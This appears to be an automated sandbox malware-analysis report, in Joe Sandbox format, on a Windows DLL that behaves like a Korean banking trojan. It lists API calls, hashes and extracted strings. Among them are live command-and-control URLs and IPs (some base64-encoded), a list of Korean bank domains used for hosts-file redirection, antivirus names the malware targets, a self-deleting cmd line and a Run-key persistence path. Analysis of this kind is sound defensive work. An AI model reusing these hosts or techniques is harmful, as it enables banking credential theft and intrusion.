                                                        • Instruction Fuzzy Hash: 9ED1A6B1508386AFE725CB64CD91BEB77DAEBC8344F004D2DE68697241DB74E6088753

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        • c:\3.txt, xrefs: 1000594C
                                                        • ahnlab, xrefs: 10005804
                                                        • 8.8.8.8, xrefs: 1000562D
                                                        • iRecv=0, xrefs: 10005947
                                                        • www.shinhan.com|search.daum.net|search.naver.com|www.kbstar.com.l|www.knbank.co.kr.l|openbank.cu.co.kr.l|www.busanbank.co.kr.l|www.nonghyup.com.l|www.shinhan.com.l|www.wooribank.com.l|www.hanabank.com.l|www.epostbank.go.kr.l|www.ibk.co.kr.l|www.idk.co.l|www.ke, xrefs: 100057D9
                                                        • %s|, xrefs: 100057BB
                                                        • alyac, xrefs: 100057F4
                                                        • v3lite, xrefs: 10005814
                                                        • 127.0.0.1, xrefs: 1000568F, 100058E7
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: htons$inet_addr$closesocketsocket$SleepStartupbindioctlsocketmallocselectwsprintf
                                                        • String ID: %s|$127.0.0.1$8.8.8.8$ahnlab$alyac$c:\3.txt$iRecv=0$v3lite$www.shinhan.com|search.daum.net|search.naver.com|www.kbstar.com.l|www.knbank.co.kr.l|openbank.cu.co.kr.l|www.busanbank.co.kr.l|www.nonghyup.com.l|www.shinhan.com.l|www.wooribank.com.l|www.hanabank.com.l|www.epostbank.go.kr.l|www.ibk.co.kr.l|www.idk.co.l|www.ke
                                                        • API String ID: 1328051524-4015207955
                                                        • Opcode ID: d30cd6855118c4ed05db812acc6ca3ede84177798b14eb5f2c727256319347d2
                                                        • Instruction ID: 59d3b204b2808b52f16618dbfe599499a9605bca090f4b5bd4268c99c502d16b
                                                        • Opcode Fuzzy Hash: d30cd6855118c4ed05db812acc6ca3ede84177798b14eb5f2c727256319347d2
                                                        • Instruction Fuzzy Hash: 3DA19D31608344ABE710DB64CC85BAFBBE9EFC8744F00491DF68597290DBB5EA48CB56

                                                        Control-flow Graph

                                                        APIs
                                                        • LoadLibraryA.KERNEL32 ref: 100051CA
                                                        • GetProcAddress.KERNEL32(00000000,GetExtendedUdpTable), ref: 100051DA
                                                        • GetExtendedUdpTable.IPHLPAPI(00000000,?,00000001,00000002,00000001,00000000), ref: 100051F1
                                                        • malloc.MSVCRT ref: 1000520A
                                                        • GetExtendedUdpTable.IPHLPAPI(00000000,?,00000001,00000002,00000001,00000000,?,?,1000BBB2,00000035), ref: 10005230
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: ExtendedTable$AddressLibraryLoadProcmalloc
                                                        • String ID: GetExtendedUdpTable$iphlpapi.dll
                                                        • API String ID: 2385667234-1809394930
                                                        • Opcode ID: 9cda4d2d937ca9ea04656a738db3750c05e85a8b7bb6ff9873d4febcff501f4c
                                                        • Instruction ID: 96f58e0131db4c2794c4102475dfcdcfa91b6622e08c4e565781b4b339fe8ff8
                                                        • Opcode Fuzzy Hash: 9cda4d2d937ca9ea04656a738db3750c05e85a8b7bb6ff9873d4febcff501f4c
                                                        • Instruction Fuzzy Hash: 9021E171204302ABE710DB28EC85BAB33E4EF857A0F014625F995C62C0D736D989CBA2

                                                        Control-flow Graph

                                                        APIs
                                                        • sprintf.MSVCRT ref: 1000C249
                                                        • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 1000C266
                                                        • DeviceIoControl.KERNEL32(00000000,00074080,00000000,00000000,?,00000018,?,00000000), ref: 1000C298
                                                        • GetLastError.KERNEL32(00000400,?,00000000,00000000), ref: 1000C2AC
                                                        • FormatMessageA.KERNEL32(00001300,00000000,00000000), ref: 1000C2BA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: ControlCreateDeviceErrorFileFormatLastMessagesprintf
                                                        • String ID: \\.\PHYSICALDRIVE%d
                                                        • API String ID: 1111953355-613073274
                                                        • Opcode ID: 2acd1e0c19e908a93b7c5b7100dcee112086fd50c9f33c41a1c608c64b3fe2b4
                                                        • Instruction ID: 5ad80bb175373b9c79a99d82296efbae5e1858b0759fafeee38c0ba9caf204da
                                                        • Opcode Fuzzy Hash: 2acd1e0c19e908a93b7c5b7100dcee112086fd50c9f33c41a1c608c64b3fe2b4
                                                        • Instruction Fuzzy Hash: EE4128762503046BF324DA38DC46FEB7395EBD8760F508729FA55CB1C0EEB59A088395
                                                        APIs
                                                        • GetCurrentProcess.KERNEL32(00000028,00000000,?,1000BB89,SeDebugPrivilege,00000001), ref: 10004F6A
                                                        • OpenProcessToken.ADVAPI32(00000000,?,1000BB89,SeDebugPrivilege,00000001), ref: 10004F71
                                                        • LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 10004F87
                                                        • AdjustTokenPrivileges.KERNELBASE ref: 10004FCA
                                                        • CloseHandle.KERNEL32 ref: 10004FD5
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: ProcessToken$AdjustCloseCurrentHandleLookupOpenPrivilegePrivilegesValue
                                                        • String ID:
                                                        • API String ID: 3038321057-0
                                                        • Opcode ID: 6492371ed49e88a72c7fec690fb5aec638d8b1baddfd75691bf953eb0ca51b84
                                                        • Instruction ID: c701719b87b05cfe8771a17752f492869be4f49267ac35e7975cb97a64b2d278
                                                        • Opcode Fuzzy Hash: 6492371ed49e88a72c7fec690fb5aec638d8b1baddfd75691bf953eb0ca51b84
                                                        • Instruction Fuzzy Hash: B001D7B8608301ABE704DF64C885B6A77E8FBC8B45F40891CF58986294DB74D945CB62
                                                        APIs
                                                        • DeviceIoControl.KERNEL32(00000000,0007C088,?,00000020,?,00000210,1000C305,00000000), ref: 1000C1B0
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: ControlDevice
                                                        • String ID:
                                                        • API String ID: 2352790924-0
                                                        • Opcode ID: 922dce9e470f2a9cc2907bd16655acb977d25aac2a30b40252a160cce2e3ee64
                                                        • Instruction ID: 86cc3cd5e500d09f34f504799c04322c58a7eb8eb055a7fb12ab9f39681c7df9
                                                        • Opcode Fuzzy Hash: 922dce9e470f2a9cc2907bd16655acb977d25aac2a30b40252a160cce2e3ee64
                                                        • Instruction Fuzzy Hash: 98F0A96228A3C29EE302CB688855BD2FFA47B76710F0CD7C9E1D85B283C2548598D766
                                                        APIs
                                                        • CreateToolhelp32Snapshot.KERNEL32(00000000,00000000,10006A02,00000002,00000000,00000000,00000000), ref: 10004AAA
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: CreateSnapshotToolhelp32
                                                        • String ID:
                                                        • API String ID: 3332741929-0
                                                        • Opcode ID: ffb66c5084afd78fca587a2f1059ca1cf85e345028acd843578f3c2e5860b739
                                                        • Instruction ID: 060d65689bf084ce19dac5ab6480e93eac1479a40d4c6f650e99f699fddfa71d
                                                        • Opcode Fuzzy Hash: ffb66c5084afd78fca587a2f1059ca1cf85e345028acd843578f3c2e5860b739
                                                        • Instruction Fuzzy Hash: BEB09276104200ABD204DB10C984C2BB7E8AB94340B008808F88682110C634D880CB21

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 10006AA0: wsprintfA.USER32 ref: 10006ACE
                                                          • Part of subcall function 10006AA0: GetModuleFileNameA.KERNEL32(00000000,c:\windows\SysWOW64\rundll32.exe,00000104,1000BB2D), ref: 10006AE5
                                                          • Part of subcall function 10006AA0: GetModuleFileNameA.KERNEL32(10000000,c:\ftelcs\rjqzr.dll,00000104), ref: 10006AF7
                                                          • Part of subcall function 10006AA0: strrchr.MSVCRT ref: 10006B25
                                                          • Part of subcall function 10006AA0: wsprintfA.USER32 ref: 10006B3D
                                                          • Part of subcall function 10006AA0: wsprintfA.USER32 ref: 10006B4E
                                                          • Part of subcall function 10006AA0: wsprintfA.USER32 ref: 10006B5F
                                                        • PathFileExistsA.SHLWAPI(c:\test.1), ref: 1000BB32
                                                        • GetCurrentProcessId.KERNEL32 ref: 1000BB3C
                                                          • Part of subcall function 10004FF0: OpenProcess.KERNEL32(001F0FFF,00000000,?,?,1000509A,?,76F90F00), ref: 10004FFD
                                                          • Part of subcall function 10004FF0: TerminateProcess.KERNEL32(00000000,00000000), ref: 1000500C
                                                          • Part of subcall function 10004FF0: CloseHandle.KERNEL32(00000000), ref: 10005017
                                                        • ExitProcess.KERNEL32 ref: 1000BB4D
                                                        • CreateMutexA.KERNEL32(00000000,00000001,Mkrnaver.com:6520), ref: 1000BB5D
                                                        • GetLastError.KERNEL32 ref: 1000BB63
                                                        • Sleep.KERNEL32(000007D0), ref: 1000BC33
                                                        • DeleteFileA.KERNEL32(?), ref: 1000BC36
                                                        • CreateThread.KERNEL32(00000000,00000000,10009280,00000000,00000000,00000000), ref: 1000BC5B
                                                        • Sleep.KERNEL32(000003E8), ref: 1000BC62
                                                        Strings
                                                        • krnaver.com:6520, xrefs: 1000BC8D, 1000BD0B
                                                        • Mkrnaver.com:6520, xrefs: 1000BB54
                                                        • c:\ftelcs\ReadMe.txt, xrefs: 1000BB8E, 1000BBDA
                                                        • c:\windows\system32, xrefs: 1000BC0B
                                                        • 123, xrefs: 1000BBBA
                                                        • c:\test.1, xrefs: 1000BB2D
                                                        • cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "%s", xrefs: 1000BE1C
                                                        • d3d3LnNoaW5oYW4uY29tfHNlYXJjaC5kYXVtLm5ldHxzZWFyY2gubmF2ZXIuY29tfHd3dy5rYnN0YXIuY29tLmlrcnx3d3cua25iYW5rLmNvLmtyLmlrcnxvcGVuYmFuay5jdS5jby5rci5pa3J8d3d3LmJ1c2FuYmFuay5jby5rci5pa3J8d3d3Lm5vbmdoeXVwLmNvbS5pa3J8d3d3LnNoaW5oYW4uY29tLmlrcnx3d3cud29vcmliYW5rLmNvbS5p, xrefs: 1000BCAA
                                                        • www.shinhan.com|search.daum.net|search.naver.com|www.kbstar.com.l|www.knbank.co.kr.l|openbank.cu.co.kr.l|www.busanbank.co.kr.l|www.nonghyup.com.l|www.shinhan.com.l|www.wooribank.com.l|www.hanabank.com.l|www.epostbank.go.kr.l|www.ibk.co.kr.l|www.idk.co.l|www.ke, xrefs: 1000BCE3
                                                        • SeDebugPrivilege, xrefs: 1000BB7F
                                                        • c:\wiseman.exe, xrefs: 1000BBF8, 1000BC12
                                                        • aHR0cDovLzE3NC4xMzkuNjUuMjIyOjI1MzY4L25ld3MucGhw, xrefs: 1000BC7E
                                                        • http://107.163.241.204:12354/show.php, xrefs: 1000BCB9
                                                        • c:\ftelcs, xrefs: 1000BE13
                                                        • MTc0LjEzOS42NS44Njo1NjU4MA==, xrefs: 1000BC6D
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: FileProcesswsprintf$CreateModuleNameSleep$CloseCurrentDeleteErrorExistsExitHandleLastMutexOpenPathTerminateThreadstrrchr
                                                        • String ID: 123$MTc0LjEzOS42NS44Njo1NjU4MA==$Mkrnaver.com:6520$SeDebugPrivilege$aHR0cDovLzE3NC4xMzkuNjUuMjIyOjI1MzY4L25ld3MucGhw$c:\ftelcs$c:\ftelcs\ReadMe.txt$c:\test.1$c:\windows\system32$c:\wiseman.exe$cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "%s"$d3d3LnNoaW5oYW4uY29tfHNlYXJjaC5kYXVtLm5ldHxzZWFyY2gubmF2ZXIuY29tfHd3dy5rYnN0YXIuY29tLmlrcnx3d3cua25iYW5rLmNvLmtyLmlrcnxvcGVuYmFuay5jdS5jby5rci5pa3J8d3d3LmJ1c2FuYmFuay5jby5rci5pa3J8d3d3Lm5vbmdoeXVwLmNvbS5pa3J8d3d3LnNoaW5oYW4uY29tLmlrcnx3d3cud29vcmliYW5rLmNvbS5p$http://107.163.241.204:12354/show.php$krnaver.com:6520$www.shinhan.com|search.daum.net|search.naver.com|www.kbstar.com.l|www.knbank.co.kr.l|openbank.cu.co.kr.l|www.busanbank.co.kr.l|www.nonghyup.com.l|www.shinhan.com.l|www.wooribank.com.l|www.hanabank.com.l|www.epostbank.go.kr.l|www.ibk.co.kr.l|www.idk.co.l|www.ke
                                                        • API String ID: 666504283-2884798123
                                                        • Opcode ID: eeceb974db4162b4b79dbcfdfdf24e000be0470a91cd1a8cc186129b97d64d08
                                                        • Instruction ID: 5cd0a8869e93d6a979fce39eaddf385ca287bc042528285295ef5772baaaf24e
                                                        • Opcode Fuzzy Hash: eeceb974db4162b4b79dbcfdfdf24e000be0470a91cd1a8cc186129b97d64d08
                                                        • Instruction Fuzzy Hash: 42710275784B043BF260E7B49C47FAA3581DB85B95F210618F706BE1C6DEE0FA44816E

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: strcspnstrstr$strncpy$Startupatoiclosesocketconnecthtonssocket
                                                        • String ID: http://
                                                        • API String ID: 2221484516-1121587658
                                                        • Opcode ID: e796253f5733396ff72147a4a2ef7bd5d4f44e6beee7f9c8da961514743a8591
                                                        • Instruction ID: 0e5d105b79d1c08d9eecff392c4fb5612e00c83b4c249196a63be804c0ca8b01
                                                        • Opcode Fuzzy Hash: e796253f5733396ff72147a4a2ef7bd5d4f44e6beee7f9c8da961514743a8591
                                                        • Instruction Fuzzy Hash: 0851D4312043406BE314DB34CC45BEBB7D9FFC9354F404A2DFA5997280EB79D65886A6

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 10001000: lstrcpy.KERNEL32(00000000,00000001), ref: 10001155
                                                        • Sleep.KERNEL32(0000EA60), ref: 100092D8
                                                        • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 10009323
                                                        • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1000932F
                                                        • Sleep.KERNEL32(000927C0), ref: 10009470
                                                        • wsprintfA.USER32 ref: 100094C1
                                                        • Sleep.KERNEL32(000927C0), ref: 1000951B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: Sleep$DirectorySystem$lstrcpywsprintf
                                                        • String ID: QVNEU3ZjLmV4ZQ==$QVlSVFNydi5heWU=$XGRyaXZlcnNcZXRjXGhvc3Rz$XGRyaXZlcnNcZXRjXGhvc3RzLmljcw==$c:\1.txt$http://107.163.241.204:12354/show.php$iOffset
                                                        • API String ID: 2291147283-2972267883
                                                        • Opcode ID: 3947ad85ef8615cbfb42fece4b63a6b130437b3477a6dfc2854689d71249a6be
                                                        • Instruction ID: 4b4f84e37046363ba8aa3a5b9b5c37e80be516aa45bc2cdeab28b5ca764bbc5e
                                                        • Opcode Fuzzy Hash: 3947ad85ef8615cbfb42fece4b63a6b130437b3477a6dfc2854689d71249a6be
                                                        • Instruction Fuzzy Hash: 515147755046446BE765C674CC52BEB36C6EBC83D0F100A3CF74A872C6EE71EA498692

                                                        Control-flow Graph

                                                        APIs
                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,?,76F90F00,10005086,00000000,self), ref: 10004DFC
                                                        • strrchr.MSVCRT ref: 10004E09
                                                        • CreateFileA.KERNEL32(?,10000000,00000007,00000000,00000004,00000080,00000000), ref: 10004E62
                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 10004E78
                                                        • time.MSVCRT(00000000), ref: 10004E7F
                                                        • _localtime32.MSVCRT(?), ref: 10004E8E
                                                        • strftime.MSVCRT ref: 10004EA1
                                                        • vsprintf.MSVCRT ref: 10004EF3
                                                        • sprintf.MSVCRT ref: 10004F13
                                                        • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 10004F3D
                                                        • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 10004F44
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: File$CloseCreateHandleModuleNamePointerWrite_localtime32sprintfstrftimestrrchrtimevsprintf
                                                        • String ID: %s%s$log.txt
                                                        • API String ID: 2392943451-1489102009
                                                        • Opcode ID: d1bdc3c774a689637d6f495e9813b9ee9ac93210ea13629b8e67d8557dd03d55
                                                        • Instruction ID: d5d278936535e4cba90bc0b152de8e4c93260a9cf759ec48f07ff2ba3d5d953d
                                                        • Opcode Fuzzy Hash: d1bdc3c774a689637d6f495e9813b9ee9ac93210ea13629b8e67d8557dd03d55
                                                        • Instruction Fuzzy Hash: DF41B5B1148345AFE328CB74CC899EB7BA9EBC8350F404A2DF75A872D0DFB499098651

                                                        Control-flow Graph

                                                        APIs
                                                        • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1000B6EA
                                                        • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1000B6F9
                                                          • Part of subcall function 10001000: lstrcpy.KERNEL32(00000000,00000001), ref: 10001155
                                                        • Sleep.KERNEL32(000927C0), ref: 1000B822
                                                        • wsprintfA.USER32 ref: 1000B8A7
                                                        • WinExec.KERNEL32(cmd.exe /c ipconfig /flushdns,00000000), ref: 1000B8C9
                                                        • Sleep.KERNEL32(000927C0), ref: 1000B8D5
                                                        Strings
                                                        • 8.8.8.8, xrefs: 1000B8B0
                                                        • XGRyaXZlcnNcZXRjXGhvc3RzLmljcw==, xrefs: 1000B716
                                                        • http://107.163.241.204:12354/show.php, xrefs: 1000B7DB
                                                        • cmd.exe /c ipconfig /flushdns, xrefs: 1000B8C4
                                                        • XGRyaXZlcnNcZXRjXGhvc3Rz, xrefs: 1000B6FB
                                                        • 127.0.0.1, xrefs: 1000B8B5
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: DirectorySleepSystem$Execlstrcpywsprintf
                                                        • String ID: 127.0.0.1$8.8.8.8$XGRyaXZlcnNcZXRjXGhvc3Rz$XGRyaXZlcnNcZXRjXGhvc3RzLmljcw==$cmd.exe /c ipconfig /flushdns$http://107.163.241.204:12354/show.php
                                                        • API String ID: 3328814713-1394719493
                                                        • Opcode ID: 5ededa175b8e96c9b9bc53b0268d409d7794e43692312860f689a34b4737d91d
                                                        • Instruction ID: 88cf6c134119007ad9893c1780bc282dad92caf7e2c613694f1faa43efeb6312
                                                        • Opcode Fuzzy Hash: 5ededa175b8e96c9b9bc53b0268d409d7794e43692312860f689a34b4737d91d
                                                        • Instruction Fuzzy Hash: 6C517F71504A486BE764CE74CC51AEB3BCAEBC8290F104A3CF7468B2D5EE75D948C391

                                                        Control-flow Graph

                                                        APIs
                                                        • VirtualAlloc.KERNEL32(00000000,ABAD1000,00001000,00000040,00F31100), ref: 00F3085C
                                                        • wsprintfA.USER32 ref: 00F308E1
                                                        • wsprintfA.USER32 ref: 00F30900
                                                        • MessageBoxA.USER32(00000000,File corrupt.,Application error,00000010), ref: 00F30918
                                                        • ExitProcess.KERNEL32(00000000), ref: 00F30920
                                                        • VirtualFree.KERNELBASE(00F40000,00000000,00008000,ED815D00), ref: 00F30969
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3803214756.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_f30000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: Virtualwsprintf$AllocExitFreeMessageProcess
                                                        • String ID: Application error$File corrupt.$SWVU$The ordinal %d could not be located in the DLL %s.$The procedure %s could not be located in the DLL %s.
                                                        • API String ID: 81942880-1423270863
                                                        • Opcode ID: c79b1c611a59b2f0b62d6b76279985f839f984ab3ab89f0c580d4d927e070505
                                                        • Instruction ID: 8f6bbf9fa76d40dc9cdc13d791236ba6c4de124a8037939fdff4ea8bfd2c8c8a
                                                        • Opcode Fuzzy Hash: c79b1c611a59b2f0b62d6b76279985f839f984ab3ab89f0c580d4d927e070505
                                                        • Instruction Fuzzy Hash: E5418D3264170A9FEB38CF14CC54FEB73A9EF44360F04421AED4697249EF70A8119B90

                                                        Control-flow Graph

                                                        APIs
                                                        • wsprintfA.USER32 ref: 100078B3
                                                          • Part of subcall function 10004940: InternetOpenA.WININET(?,?,?,?,?), ref: 10004959
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: InternetOpenwsprintf
                                                        • String ID: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)$http://blog.sina.com.cn/u/%s$title
                                                        • API String ID: 4197039022-1204782975
                                                        • Opcode ID: 999803450e33462b64aaa07c69cc296db7b29de33b2c74d620c9af4bde4234c4
                                                        • Instruction ID: 82104e091b356ad4de5d2ae183cb47f0814ad9c1a023d1d303f6ff2c213bd519
                                                        • Opcode Fuzzy Hash: 999803450e33462b64aaa07c69cc296db7b29de33b2c74d620c9af4bde4234c4
                                                        • Instruction Fuzzy Hash: F1D14D76E002446FEB14CF68DC81BFEBBA5FB44260F10426EF9199B6C1DA769E01C791

                                                        Control-flow Graph

                                                        APIs
                                                        • RegOpenKeyExA.KERNEL32(80000002,?,00000000,000F003F,?,?,?,?), ref: 10006F9F
                                                        • GlobalMemoryStatusEx.KERNEL32(?), ref: 10007059
                                                        • GetSystemDefaultUILanguage.KERNEL32(?,?,?,?,?,?), ref: 100070B2
                                                          • Part of subcall function 10004C70: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,76F90F10,?,1000AAC6,?,76F90F10,00000000,000000FF,?,00000104,?,?,?), ref: 10004C8E
                                                          • Part of subcall function 10004C60: RegCloseKey.KERNEL32(1000AB02,1000AE3A,80000002,1000AB02,?,?,?,?,76F90F00), ref: 10004C65
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: CloseDefaultGlobalLanguageMemoryOpenQueryStatusSystemValue
                                                        • String ID: %u MB$09161305$@$Find CPU Error$HARDWARE\DESCRIPTION\System\CentralProcessor\0$ProcessorNameString$http://107.163.241.204:12354/show.php

                                                        APIs
                                                        Strings
                                                        Similarity
                                                        • API ID: DeleteFile$wsprintf
                                                        • String ID: %s\ASDSvc.exe$%s\V3Lite.exe$C:\1.vbs$InstallPath$U09GVFdBUkVcQWhuTGFiXFYzTGl0ZQ==

                                                        APIs
                                                        • WSAStartup.WS2_32(00000202,?), ref: 10008D63
                                                          • Part of subcall function 100048E0: CreateMutexA.KERNEL32(?,?,?,10008E45), ref: 100048EF
                                                        • GetLastError.KERNEL32 ref: 10008D7C
                                                        • CloseHandle.KERNEL32(00000000), ref: 10008DEE
                                                          • Part of subcall function 10007850: wsprintfA.USER32 ref: 100078B3
                                                        • Sleep.KERNEL32(0002BF20,00000000,00000000), ref: 10008DB0
                                                        • CreateThread.KERNEL32 ref: 10008DCC
                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 10008DD7
                                                        • CloseHandle.KERNEL32(00000000), ref: 10008DDE
                                                        • Sleep.KERNEL32(0002BF20), ref: 10008DE9
                                                        Strings
                                                        Similarity
                                                        • API ID: CloseCreateHandleSleep$ErrorLastMutexObjectSingleStartupThreadWaitwsprintf
                                                        • String ID: 0x5d65r455f$5655029807

                                                        Control-flow Graph

                                                        control_flow_graph 444 1000c3e0-1000c42a Netbios 445 1000c42c-1000c43e 444->445 446 1000c43f-1000c447 444->446 447 1000c449-1000c466 Netbios 446->447 448 1000c48e-1000c4ee Netbios 446->448 447->448 449 1000c468-1000c475 447->449 450 1000c4f0-1000c502 448->450 451 1000c503-1000c572 sprintf 448->451 449->447 452 1000c477-1000c479 449->452 452->448 453 1000c47b-1000c48d 452->453
                                                        APIs
                                                        Strings
                                                        Similarity
                                                        • API ID: Netbios
                                                        • String ID: %02X%02X%02X%02X%02X%02X$2$3
                                                        APIs
                                                        • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,00000000), ref: 1000BA17
                                                        • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,?,?,?,00000000,00000000), ref: 1000BA4D
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 1000BAFD
                                                        • Sleep.KERNEL32(000493E0), ref: 1000BB08
                                                        Strings
                                                        • SOFTWARE\Microsoft\Windows\CurrentVersion\Run, xrefs: 1000BA0D
